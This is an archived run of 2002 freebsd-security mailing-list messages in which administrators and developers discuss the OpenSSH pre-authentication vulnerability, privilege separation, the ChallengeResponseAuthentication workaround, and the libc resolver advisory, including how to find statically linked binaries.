body of the message From owner-freebsd-security Wed Jun 26 17:24: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 73BEC37CD1B for ; Wed, 26 Jun 2002 17:21:41 -0700 (PDT) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 33B055361; Thu, 27 Jun 2002 02:21:27 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Maxim Kozin Cc: security@FreeBSD.ORG Subject: Re: openssh-portable and s/key passwords References: From: Dag-Erling Smorgrav Date: 27 Jun 2002 02:21:26 +0200 In-Reply-To: Message-ID: Lines: 8 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Maxim Kozin writes: > "Request type 24" is some about tty/pty ? Request type 24 is MONITOR_REQ_KEYEXPORT. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 17:27:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx01.nexgo.de (mx01.nexgo.de [151.189.8.96]) by hub.freebsd.org (Postfix) with ESMTP id 5C64937BF52 for ; Wed, 26 Jun 2002 16:25:51 -0700 (PDT) Received: from localhost (dsl-213-023-062-204.arcor-ip.net [213.23.62.204]) by mx01.nexgo.de (Postfix) with ESMTP id ECFDA3BD4E; Wed, 26 Jun 2002 23:15:35 +0200 (CEST) Received: by localhost (Postfix, from userid 31451) id 534C644B1; Wed, 26 Jun 2002 23:15:31 +0200 (CEST) Date: Wed, 26 Jun 2002 23:15:31 +0200 From: Markus Friedl To: Brett Glass Cc: Jan Lentfer , FreeBSD Security Mailling List Subject: Re: OpenSSH Security (just a question, please no f-war) Message-ID: <20020626211530.GB902@folly> References: <1025116241.2817.2.camel@jan-linux.lan> <4.3.2.7.2.20020626124251.02213460@localhost> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <4.3.2.7.2.20020626124251.02213460@localhost> User-Agent: Mutt/1.3.28i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org 3.3 has not fixed the bugs, but 3.4 fixes these bugs. see http://www.openssh.com/txt/preauth.adv (2nd rev) -m On Wed, Jun 26, 2002 at 12:51:15PM -0600, Brett Glass wrote: > At 12:30 PM 6/26/2002, Jan Lentfer wrote: > > >I am now running 3.3p1 on all my boxes (FreeBSD & Linux) with Privilige > >Separation enabled. Is this configuration secure for now or not? > > It's not clear. The OpenSSH team claims that when the fixed the bug > discovered by ISS they also fixed other vulnerabilities which ISS > did NOT discover. If any of these are in 3.3p1, we may be vulnerable. > Markus would, of course, be the authority on this issue; maybe he'd > care to comment? > > --Brett > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 17:34:20 2002 Delivered-To: freebsd-security@freebsd.org Received: from ainaz.pair.com (ainaz.pair.com [209.68.2.66]) by hub.freebsd.org (Postfix) with SMTP id A505E37BF80 for ; Wed, 26 Jun 2002 16:26:47 -0700 (PDT) Received: (qmail 59750 invoked by uid 3338); 26 Jun 2002 21:40:05 -0000 Date: Wed, 26 Jun 2002 17:40:05 -0400 From: Travis Cole To: Petr Swedock Cc: freebsd-security@freebsd.org Subject: Re: Wow Message-ID: <20020626214005.GC53981@ainaz.pair.com> References: <200206261741.g5QHf3LI027927@cvs.openbsd.org> <867kklaneg.fsf@blade-runner.mit.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <867kklaneg.fsf@blade-runner.mit.edu> User-Agent: Mutt/1.3.25i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 26, 2002 at 02:46:31PM -0400, Petr Swedock wrote: > > I'll be rethinking my use of OpenSSH for the very same > reason. You're not my dad, my cop, my priest, my lawyer > or firefighter. NOR are you the Unix version of 'install > wizard'. I expect code from you. That's it. Write code. I was thinking the same thing a few hours ago. But I've since changed my mind. > I don't expect paternalism, risk assesments, restrictions, > regulations or even the time of day. I have no concern > for what you think my risks are NOR your preferred method > of ameliorating those risks. Write the fucking code. I ask > for no warrantee. I don't call you with help desk questions. > Write the code and get down off that extremely high horse > before you hurt yourself. I think Theo and the OpenSSH team did the right thing here. But, unfortunatly things didn't work out so well :( No one knew this was coming. So they had the oportunity to minimize the impact by urging people to upgrade to a new version of OpenSSH which would mitigate the problem. All before any of the bad guys knew what the problem was. We knew a source fix was coming, so we could choose to wait for that or install 3.3 with privsep and run it for a week then upgrade again. Through an unfortunate string of circumstance this whole thing got ugly. I got pissed off, a lot of others got pissed off. Here is how I see it. The cold hard truth. What Theo and the OpenSSH team did was the right thing. Unfortunatly they didn't use the best words to express what was needed. I think thats whats really pissing people off. Not what they did, but how they said it. I feel a lot better about things now that I've realized that. And then of course there is ISS... I don't have any good words to say about them. -- -tcole To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 17:36:25 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id 038C737BFCC; Wed, 26 Jun 2002 16:27:45 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id RAA17176; Wed, 26 Jun 2002 17:27:34 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020626172629.038ea900@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 26 Jun 2002 17:27:06 -0600 To: Brian Behlendorf , Robert Watson From: Brett Glass Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv Cc: freebsd-security@FreeBSD.ORG In-Reply-To: <20020626152851.Q310-100000@yez.hyperreal.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 04:29 PM 6/26/2002, Brian Behlendorf wrote: >Sorry for the newbie question here, but is there a way to programmatically >determine which binaries on a system static-linked libc? I tried "nm" but >that needs non-stripped executables... I suppose you could brute force this by grepping the binaries. Ugly, but it'd work. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 17:38:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from 12-234-90-219.client.attbi.com (12-234-90-219.client.attbi.com [12.234.90.219]) by hub.freebsd.org (Postfix) with ESMTP id EA82737C018 for ; Wed, 26 Jun 2002 16:28:57 -0700 (PDT) Received: from master.gorean.org (master.gorean.org [10.0.0.2]) by 12-234-90-219.client.attbi.com (8.12.3/8.12.3) with ESMTP id g5QNSvBu043083 for ; Wed, 26 Jun 2002 16:28:57 -0700 (PDT) (envelope-from DougB@FreeBSD.org) Received: from localhost (doug@localhost) by master.gorean.org (8.12.4/8.12.4/Submit) with ESMTP id g5QNSvNa042333 for ; Wed, 26 Jun 2002 16:28:57 -0700 (PDT) Date: Wed, 26 Jun 2002 16:28:57 -0700 (PDT) From: Doug Barton To: freebsd-security@FreeBSD.org Subject: Griping is not on topic for this list In-Reply-To: Message-ID: <20020626162450.Y42164-100000@master.gorean.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In case it hasn't already been made clear, griping about how third parties handle vulnerability alerts for their software is NOT on topic for this list. Thanks, Doug To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 17:40:18 2002 Delivered-To: freebsd-security@freebsd.org Received: from ainaz.pair.com (ainaz.pair.com [209.68.2.66]) by hub.freebsd.org (Postfix) with SMTP id E7EE237B416 for ; Wed, 26 Jun 2002 16:30:10 -0700 (PDT) Received: (qmail 60130 invoked by uid 3338); 26 Jun 2002 21:43:28 -0000 Date: Wed, 26 Jun 2002 17:43:28 -0400 From: Travis Cole To: freebsd-security@freebsd.org Cc: Theo de Raadt Subject: Re: Wow Message-ID: <20020626214328.GD53981@ainaz.pair.com> References: <20020626185126.GB35484@ainaz.pair.com> <200206261854.g5QIsNLI015235@cvs.openbsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <200206261854.g5QIsNLI015235@cvs.openbsd.org> User-Agent: Mutt/1.3.25i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 26, 2002 at 12:54:23PM -0600, Theo de Raadt wrote: > > We also did 5600 lines of further security auditing work over the last > week. We're fairly convinced that some of the things we changed are > relevant as well. ie. more holes. > > And that is commited in 3.4 Like I said in a few other emails. I've thought about this some more and I think Theo is right here. The upgrade to 3.4 is worth it. Lots of people are running some pretty crufty versions of OpenSSH. Many issues were fixed in 3.4. > By all means. Please continue running what you have. Don't upgrade > to 3.4. And please turn privsep off. Nope. I plan to upgrade. I've got 300 boxes that will be seeing 3.4 soon. -- -tcole To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 17:43:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from ainaz.pair.com (ainaz.pair.com [209.68.2.66]) by hub.freebsd.org (Postfix) with SMTP id 982EB37C144 for ; Wed, 26 Jun 2002 16:33:54 -0700 (PDT) Received: (qmail 78291 invoked by uid 3338); 26 Jun 2002 23:33:53 -0000 Date: Wed, 26 Jun 2002 19:33:53 -0400 From: Travis Cole To: Maxim Kozin Cc: freebsd-security@FreeBSD.ORG Subject: Re: The "race" that Theo sought to avoid has begun (Was: OpenSSH Advisory) Message-ID: <20020626233353.GB77856@ainaz.pair.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.3.25i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Jun 27, 2002 at 12:50:41AM +0400, Maxim Kozin wrote: > > Ppl, before you are going crazy, think a little. > > Theo did you a favor when he released his letter. Why? Because now all of > > you are using privsep, which will hopefully help you if the another 100 > > exploits will be released/found in OpenSSH... > Not all, because privsep has trouble with some PAM modules, but > "ChallengeResponseAuthentication no" work. If we can know this in begin of > sshisteria ! Yes, but if we had known about that from day one, so would the guys who like to write exploits. There are some very smart people doing that and the second they saw "Just set ChallengeResponseAuthentication to no" that really makes it easier to figure out where the problem is. You immediately narrow their search from thousands of lines of code to only a few hundred. -- -tcole To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 17:46:18 2002 Delivered-To: freebsd-security@freebsd.org Received: from lurza.secnetix.de (lurza.secnetix.de [212.66.1.130]) by hub.freebsd.org (Postfix) with ESMTP id 862C737C171 for ; Wed, 26 Jun 2002 16:34:55 -0700 (PDT) Received: (from olli@localhost) by lurza.secnetix.de (8.11.6/8.11.6) id g5QNYhQ40207; Thu, 27 Jun 2002 01:34:43 +0200 (CEST) (envelope-from oliver.fromme@secnetix.de) Date: Thu, 27 Jun 2002 01:34:43 +0200 (CEST) Message-Id: <200206262334.g5QNYhQ40207@lurza.secnetix.de> From: Oliver Fromme To: freebsd-security@FreeBSD.ORG Subject: sshd + jail (was Re: OpenSSH Security) X-Newsgroups: list.freebsd-security User-Agent: tin/1.5.4-20000523 ("1959") (UNIX) (FreeBSD/4.5-RELEASE (i386)) MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Poul-Henning Kamp wrote: > Which reminds me that we should really tweak the code and put it in a > jail instead of a chroot. Slightly related ... For a custom application I modified the sshd source to make a jail() call right after the username had been transferred. So user authentication already happens within the jail, using the spwd.db inside the jail and so on. I added a config option for sshd_config to specify jail parameters (chroot directory, IP, hostname) per-user. I had to do that because for certain reasons we weren't able to run a separate sshd in each and every jail. Patching the sshd source as described above enabled us to run just one sshd on the machine. Of course, it also has disadvantages, the largest ist that a user who logs in twice is actually in two different jails (although they're the same chroot dir), so he can't see nor kill his own processes running in the other session. But that's something we can easily live with. I considered subitting my patches, but to be honest, I wasn't sure where to submit them. To the OpenSSH people? Nope, the patches are clearly FreeBSD-specific. So submit them to the FreeBSD people? I don't know. Also, the patches are for openssh 2.9. I haven't looked at the openssh 3.3 or 3.4 sources yet, but I fear that it will be difficult to merge the patches there, and it's probably impossible to use them with privsep enabled, because jail() requires superuser priviledges, but the authentication is performed as the sshd user when privsep is enabled. (Please someone correct me if I'm wrong.) Anyway. If anyone wants to look at my jail() patches for sshd (openssh 2.9), I'll be happy to mail them or put them up on some webpage. We use them in production for almost a year now. Regards Oliver -- Oliver Fromme, secnetix GmbH & Co KG, Oettingenstr. 2, 80538 München Any opinions expressed in this message may be personal to the author and may not necessarily reflect the opinions of secnetix in any way. "All that we see or seem is just a dream within a dream" (E. A. Poe) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 17:48:59 2002 Delivered-To: freebsd-security@freebsd.org Received: from spork.pantherdragon.org (spork.pantherdragon.org [206.29.168.146]) by hub.freebsd.org (Postfix) with ESMTP id 7BB1537C18F for ; Wed, 26 Jun 2002 16:35:40 -0700 (PDT) Received: from spark.techno.pagans (spark.techno.pagans [4.61.202.145]) by spork.pantherdragon.org (Postfix) with ESMTP id 97071471DA for ; Wed, 26 Jun 2002 14:34:08 -0700 (PDT) Received: from pantherdragon.org (speck.techno.pagans [172.21.42.2]) by spark.techno.pagans (Postfix) with ESMTP id A9733FEBE for ; Wed, 26 Jun 2002 14:34:06 -0700 (PDT) Message-ID: <3D1A334E.40076AD0@pantherdragon.org> Date: Wed, 26 Jun 2002 14:34:06 -0700 From: Darren Pilgrim X-Mailer: Mozilla 4.76 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Now I'm really confused! Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I know a great deal of you are utterly sick and tired with the whole OpenSSH fiasco. I am too, but I'm also really confused, and now worried about the security of my machine. I upgraded OpenSSH to 3.3p1 only to be told that the stock version I had wasn't vulnerable. I've also now been told that "ChallengeResponseAuthentication no" in my sshd_config is the real workaround. My question(s): With v3.3p1, and "ChallengeResponseAuthentication no" in /etc/ssh/sshd_config, from a security standpoint, am I better off, worse off, or at about the same level that I was at with the stock 4.5-R sshd? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 17:53:40 2002 Delivered-To: freebsd-security@freebsd.org Received: from penguin.capmon.com (penguin.capmon.com [203.37.39.51]) by hub.freebsd.org (Postfix) with ESMTP id 6602E37B752 for ; Wed, 26 Jun 2002 16:40:50 -0700 (PDT) Received: from pokemon (pokemon.capmon.com [203.37.39.18]) by penguin.capmon.com (8.9.3/8.9.3/Debian 8.9.3-21) with SMTP id JAA31257 for ; Thu, 27 Jun 2002 09:45:23 +1000 X-Authentication-Warning: penguin.capmon.com: Host pokemon.capmon.com [203.37.39.18] claimed to be pokemon Message-Id: <3.0.5.32.20020627095507.06503850@mailhost.capmon.com> X-Sender: haydn@mailhost.capmon.com X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32) Date: Thu, 27 Jun 2002 09:55:07 +1000 To: freebsd-security@freebsd.org From: Haydn Kent Subject: Re: Viruses attaahce to emails in this mailing list In-Reply-To: <20020626144153.P45037-100000@favour.one2net.co.ug> References: <028001c21d05$d9c0d310$8c97d8c1@tele2unixgurun> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 14:42 26/06/02 +0300, you wrote: > >They shouldn't bother you unless you're using M$ for reading your mail!! > >Noah. Some admins don't have a choice of what email client they use as it can be predicated by organisation wide standards or needing to use what your clients use. - another person who's tiring of the attachments despite not using M$. cheers > >On Wed, 26 Jun 2002, Haakan Olofsson wrote: > >> damnit >> >> cant you block attachments in this mailinglist, im getting tired of getting >> virii's in the mail >> >> >> Regards >> >> Olofson >> >> Beware us from the LiNUX penguin!!!! >> >> , , >> /( )` Olofson >> \ \___ / | SystemEngineer/UnixGuru >> /- _ `-/ ' >> (/\/ \ \ /\ >> / / | ` \ >> O O ) / | >> `-^--'`< ' >> (_.) _ ) / >> `.___/` / >> `-----' / >> <----. __ / __ \ >> <----|====O)))==) \) /==== >> <----' `--' `.__,' \ olofson@dax.net >> | | >> \ / >> ______( (_ / \_____ >> ,' ,-----' | \ >> `--{__________) \/ >> >> `--{__________) \/ >> >> >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> with "unsubscribe freebsd-security" in the body of the message >> > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > > _________________________________________________________ Haydn Kent IT Manager Capital Monitor Pty Ltd Suite S2.105, Press Gallery Parliament House Canberra ACT 2600 Australia Tel: 02 6273 4899 Fax: 02 6273 4905 http://www.capmon.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 17:53:53 2002 Delivered-To: freebsd-security@freebsd.org Received: from sccrmhc03.attbi.com (sccrmhc03.attbi.com [204.127.202.63]) by hub.freebsd.org (Postfix) with ESMTP id 066B437D574 for ; Wed, 26 Jun 2002 17:50:23 -0700 (PDT) Received: from InterJet.elischer.org ([12.232.206.8]) by sccrmhc03.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020626222013.LQVP903.sccrmhc03.attbi.com@InterJet.elischer.org> for ; Wed, 26 Jun 2002 22:20:13 +0000 Received: from localhost (localhost.elischer.org [127.0.0.1]) by InterJet.elischer.org (8.9.1a/8.9.1) with ESMTP id PAA65371 for ; Wed, 26 Jun 2002 15:19:08 -0700 (PDT) Date: Wed, 26 Jun 2002 15:19:07 -0700 (PDT) From: Julian Elischer To: security@freebsd.org Subject: FreeBSD vuln... Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The security officers of one of our clients (a large bank) tells us: ----begin quote--- The Apache hole itself only allows you to execute code as Nobody, but there is a working exploit in the wild now that first exploits Apache and then a bug in memcpy on FreeBSD to gain a root shell. So at this time we are vulnerable to a remote root exploit. ------- end quote now we are replacing apace on their systems but does anyone know what the memcpy bug is? I know that the OpenBSD exploit aparently uses memcpy but does anyone have details on the FreeBSD exploit? (private mails encouraged) Julian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 17:57:23 2002 Delivered-To: freebsd-security@freebsd.org Received: from bluenugget.net (bluenugget.net [64.32.175.43]) by hub.freebsd.org (Postfix) with ESMTP id EF49337C33E for ; Wed, 26 Jun 2002 16:42:59 -0700 (PDT) Received: from [192.168.4.154] (sf-gw.epylon.com [63.93.9.98]) (using TLSv1 with cipher EDH-RSA-DES-CBC3-SHA (168/168 bits)) (No client certificate requested) by bluenugget.net (Postfix) with ESMTP id 99495136C8; Wed, 26 Jun 2002 16:44:39 -0700 (PDT) Date: Wed, 26 Jun 2002 16:42:51 -0700 From: Jason DiCioccio Reply-To: Jason DiCioccio To: Mark Hartley Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv Message-ID: <2147483647.1025109771@[192.168.4.154]> In-Reply-To: References: X-Mailer: Mulberry/3.0.0a3 (Mac OS X) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Basically, if you have anything that is statically linked, it was most likely linked against libc :).. If it's a linux binary, you might be safe though for example. Of course that doesn't necessarily mean that it's going to use the functions that are vulnerable. But you can pretty safely assume that any statically linked freebsd binary on your system was linked against libc. Cheers, -JD- --On Wednesday, June 26, 2002 3:13 PM -0700 Mark Hartley wrote: > > Are there other common applications (not rebuilt by the world) that many > of us are likely to be running which are going to need to be rebuilt > (i.e. Apache, pop3 servers, db servers, etc)? > > I'm not really sure how to even know if an application would be statically > linked against libc. Maybe someone with a clue could post some > instructions on how to check out if an app is statically linked against > libc, then we could test our own apps and rebuild as needed. Anyone have > an easy way that we can tell? > > Thanks. > > Mark. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Jason DiCioccio - jd@bluenugget.net - Useless .sig Open Domain Service - geniusj@ods.org - http://www.ods.org/ Ruby - jd@ruby-lang.org - http://www.ruby-lang.org/ PGP Fingerprint - C442 04E2 26B0 3809 8357 96AB D350 9596 0436 7C08 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 18: 0: 4 2002 Delivered-To: freebsd-security@freebsd.org Received: from drugs.dv.isc.org (drugs.dv.isc.org [130.155.191.236]) by hub.freebsd.org (Postfix) with ESMTP id C1A5737C56D for ; Wed, 26 Jun 2002 16:51:17 -0700 (PDT) Received: from drugs.dv.isc.org (localhost.dv.isc.org [127.0.0.1]) by drugs.dv.isc.org (8.12.3/8.12.3) with ESMTP id g5QNpFm0029015; Thu, 27 Jun 2002 09:51:15 +1000 (EST) (envelope-from marka@drugs.dv.isc.org) Message-Id: <200206262351.g5QNpFm0029015@drugs.dv.isc.org> To: Alain Thivillon Cc: freebsd-security@FreeBSD.ORG From: Mark.Andrews@isc.org Subject: Re: bsd libc dns resolving code vulnerable? In-reply-to: Your message of "Wed, 26 Jun 2002 17:39:54 +0200." <20020626153954.GL9492@roadrunner.rominet.net> Date: Thu, 27 Jun 2002 09:51:15 +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > > > http://www.pine.nl/advisories/pine-cert-20020601.txt > > > > > > Any comments? > > > > Fixed in -CURRENT, RELENG_4, and RELENG_4_6 early this morning. I > > believe Warner is fixing RELENG_4_5 at the moment. When that is done, > > an advisory will be published. > > > > In short: upgrade. Be sure to recompile any statically linked > > applications that use DNS. > > Do you know if using a local caching name server will prevent > exploitation ? In short, does for example bind filters the responses > leading to an overflow ? In this case, i will classify this to > non-critical bug, because if someone has root access to your nameserver, > you are in trouble, even without overflow in libc. As long as your nameserver constructs the response and doesn't forward it you are fine. BIND 9 alway constucts the response (UPDATE forwarding aside). BIND 8 sometimes constructs the response and sometimes forwards it. Mark > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Mark Andrews, Internet Software Consortium 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: Mark.Andrews@isc.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 18: 0: 4 2002 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [63.229.157.2]) by hub.freebsd.org (Postfix) with ESMTP id 447C737D6C2 for ; Wed, 26 Jun 2002 17:56:12 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id SAA18188; Wed, 26 Jun 2002 18:55:40 -0600 (MDT) X-message-flag: Warning! Use of Microsoft Outlook is dangerous and makes your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20020626185228.00e8ad60@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 26 Jun 2002 18:55:37 -0600 To: Mark.Andrews@isc.org From: Brett Glass Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv Cc: security@FreeBSD.ORG In-Reply-To: <200206270012.g5R0C8m0029482@drugs.dv.isc.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 06:12 PM 6/26/2002, Mark.Andrews@isc.org wrote: > Provided you are behind a nameserver you trust that reconstructs > the answer you should be fine. > > BIND 9 reconstucts all answers (excluding forwarded UPDATES). > BIND 8 forwards some and reconstructs others. Could an exploit be set up as a forwarded UPDATE? (Forgive me if this is a naive question; I know that I need to become more familiar with DDNS.) If not, then installing BIND 9 and/or forcing clients to consult a BIND 9 server may be an acceptable workaround. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 18: 3:38 2002 Delivered-To: freebsd-security@freebsd.org Received: from postoffice.aims.com.au (eth0.lnk.aims.com.au [203.31.73.253]) by hub.freebsd.org (Postfix) with ESMTP id 0546037C630 for ; Wed, 26 Jun 2002 16:55:41 -0700 (PDT) Received: from postoffice.aims.com.au (nts-ts1.aims.private [192.168.10.2]) by postoffice.aims.com.au with ESMTP id g5QNtdm05962 for ; Thu, 27 Jun 2002 09:55:39 +1000 (EST) (envelope-from chris@aims.com.au) Received: from ntsts1 by aims.com.au with SMTP (MDaemon.v3.5.3.R) for ; Thu, 27 Jun 2002 09:54:59 +1000 Reply-To: From: "Chris Knight" To: Cc: Subject: RE: Wow Date: Thu, 27 Jun 2002 09:54:58 +1000 Message-ID: <012e01c21d6c$e16ce9c0$020aa8c0@aims.private> MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2911.0) In-Reply-To: X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Importance: Normal X-Return-Path: chris@aims.com.au X-MDaemon-Deliver-To: freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Howdy, > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Robert Watson > Sent: Thursday, 27 June 2002 6:20 > To: Jamie Norwood > Cc: freebsd-security@FreeBSD.ORG > Subject: Re: Wow > > [snip] > > If people want to do something useful, looking for nits in our > integration of the new OpenSSH code in -CURRENT would be useful, as > we're in the process of merging to -STABLE and catching the nits > sooner rather than later would really be preferred. In particular, > looking for any issues with PAM would be useful, and with non-default > authentication types (hardware authentication tokens, kerberos, etc). > Isn't the merge a little bit hasty? According to the advisory, the least intrusive change to -STABLE would be to uncomment the ChallengeResponseAuthentication in /usr/src/crypto/openssh/sshd_config. The PAM issues appear to only be in 2.9.9+. Also, my understanding of the advisory is that the exploit hasn't been fixed - it's just that Privilege Separation will limit the exploit to a chrooted environment with minimal permissions. Please correct me if I'm wrong. > Robert N M Watson FreeBSD Core Team, TrustedBSD Projects > robert@fledge.watson.org Network Associates Laboratories Regards, Chris Knight Systems Administrator AIMS Independent Computer Professionals Tel: +61 3 6334 6664 Fax: +61 3 6331 7032 Mob: +61 419 528 795 Web: http://www.aims.com.au To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 18: 7:33 2002 Delivered-To: 